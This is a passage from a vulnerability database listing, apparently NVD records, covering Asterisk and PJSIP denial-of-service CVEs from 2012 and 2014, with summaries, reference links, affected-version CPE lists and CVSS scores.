      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-019.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/129473/Asterisk-Project-Security-Advisory-AST-2014-019.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://seclists.org/fulldisclosure/2014/Dec/48"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/60251"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:018"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/534197/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/71607"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id/1031345"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-06-17 14:55

Modified

2024-11-21 02:09

Severity ?

Summary

The PJSIP Channel Driver in Asterisk Open Source before 12.3.1 allows remote attackers to cause a denial of service (deadlock) by terminating a subscription request before it is complete, which triggers a SIP transaction timeout.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-008.html	Patch, Vendor Advisory
cve@mitre.org	http://packetstormsecurity.com/files/127090/Asterisk-Project-Security-Advisory-AST-2014-008.html
cve@mitre.org	http://www.securityfocus.com/archive/1/532416/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-008.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/127090/Asterisk-Project-Security-Advisory-AST-2014-008.html
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/532416/100/0/threaded

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.1
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "63CB4F59-5EE5-4767-8303-090CCF64C185",
              "versionEndIncluding": "12.3.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F3DE062D-4E87-4691-A664-D9E7C02036EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3CD4A85-26FB-4AE5-9CB7-4DF38DF32482",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F42C9442-9EBC-4CA5-AB1C-BA0662C27BDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71762B58-A08B-405B-9596-6D15CF4A95D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EA48C05A-E898-42EE-A699-94BBD66E5E0A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EDCB78F8-AAC8-44B1-BDF4-C73BC8951EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DB5E92FB-9CF8-461E-A665-3407D265DF17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "536F6C10-3165-40F7-931A-23765AB87555",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The PJSIP Channel Driver in Asterisk Open Source before 12.3.1 allows remote attackers to cause a denial of service (deadlock) by terminating a subscription request before it is complete, which triggers a SIP transaction timeout."
    },
    {
      "lang": "es",
      "value": "El controlador de canales PJSIP en Asterisk Open Source anterior a 12.3.1 permite a atacantes remotos causar una denegaci\u00f3n de servicio (bloqueo) mediante la terminaci\u00f3n de una solicitud de suscripci\u00f3n antes de que se haya completado, lo que provoca un timeout de la transacci\u00f3n SIP."
    }
  ],
  "id": "CVE-2014-4048",
  "lastModified": "2024-11-21T02:09:24.610",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-06-17T14:55:08.017",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-008.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://packetstormsecurity.com/files/127090/Asterisk-Project-Security-Advisory-AST-2014-008.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/532416/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-008.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/127090/Asterisk-Project-Security-Advisory-AST-2014-008.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/532416/100/0/threaded"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2012-07-09 10:20

Modified

2024-11-21 01:41

Severity ?

Summary

channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.13.1 and 10.x before 10.5.2, Asterisk Business Edition C.3.x before C.3.7.5, Certified Asterisk 1.8.11-certx before 1.8.11-cert4, and Asterisk Digiumphones 10.x.x-digiumphones before 10.5.2-digiumphones does not properly handle a provisional response to a SIP reINVITE request, which allows remote authenticated users to cause a denial of service (RTP port exhaustion) via sessions that lack final responses.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2012-010.html	Patch, Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/50687
cve@mitre.org	http://secunia.com/advisories/50756
cve@mitre.org	http://www.debian.org/security/2012/dsa-2550
cve@mitre.org	http://www.securityfocus.com/bid/54327
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-19992
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2012-010.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/50687
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/50756
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2012/dsa-2550
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/54327
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-19992

Impacted products

Vendor	Product	Version
digium	asterisk_business_edition	c.3.1
digium	asterisk_business_edition	c.3.3
digium	asterisk_business_edition	c.3.7.4
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asteriske	1.8.8.0
digium	asteriske	1.8.9.1
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.1
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.1
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.1
digium	asterisk	10.1.2
digium	asterisk	10.1.3
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.1
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.1
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.1
digium	asterisk	10.4.2
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.0
digium	asterisk	10.5.1
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk_business_edition:c.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C7E50F92-00C1-4908-AA34-03F0C8B47DA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_business_edition:c.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "49842130-C25E-43F6-9EC0-A7018AD915B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk_business_edition:c.3.7.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F830CEB-2B0B-4713-8C26-9FADE6C47673",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA60A9C9-C2EF-4971-BEFB-FF687DAEF2F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BAFB22FA-CC24-4AFE-AC83-2D044563F7CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "00F3EB0D-7C63-46B5-BA95-8486B9716C78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "00C1BF3B-7593-478D-9AAA-153901C70286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F86406A-0936-4A06-88FB-4137A64498EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "672CE4C0-EBD6-470B-937E-810FF1C4CDBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88DB1105-74D8-4312-9D02-D1E21F2E785C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "404C0557-6229-4D90-BFDD-54AFFCCE6A19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6D1D26CC-891F-4396-B7D7-30D712829E71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B61EA-F4D1-452A-9D96-B8DFDD719B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9324AB96-EC99-4F04-A0A9-00F936C86EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB6BBCA-47CE-49B8-9706-AFDE4BE46550",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BFF65E2-692B-4C39-88FC-6DED8D9A7258",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E8AE686-B618-4B0D-BD27-1F96295E964D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9751C0A-84F5-4A43-8282-12A9DE559569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F67E2694-F6F1-482C-91F2-D9FD856EA31B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E2D53AA-8D50-445F-9500-2F580F260DC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8880AE7C-3E44-4B76-B500-E93868D4CF5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7C94269D-A271-42AC-A44C-102C814E564B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E7E5B826-D3D5-4D2D-BB4D-2C1BEDE92456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asteriske:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "5B9023E8-DB6F-4DE2-BB1E-D941BE279477",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asteriske:1.8.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DF6135C4-7930-4DD5-80CD-4DC7F53956D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*",
              "matchCriteriaId": "C63C46CC-02E2-40AF-8281-F2FB5D89823A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "71BAF2A7-024D-475A-88C0-0F5ADE3CA286",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "6372EEEA-2759-4B6A-BD03-D84DC956E80E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "26DF0C53-9F6A-4233-B163-AEC1F9886387",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "79A063D7-553F-486F-9079-D95C8047B05E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B606D854-FC06-4314-AD24-FEEA3796A0AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:digiumphones:*:*:*:*:*",
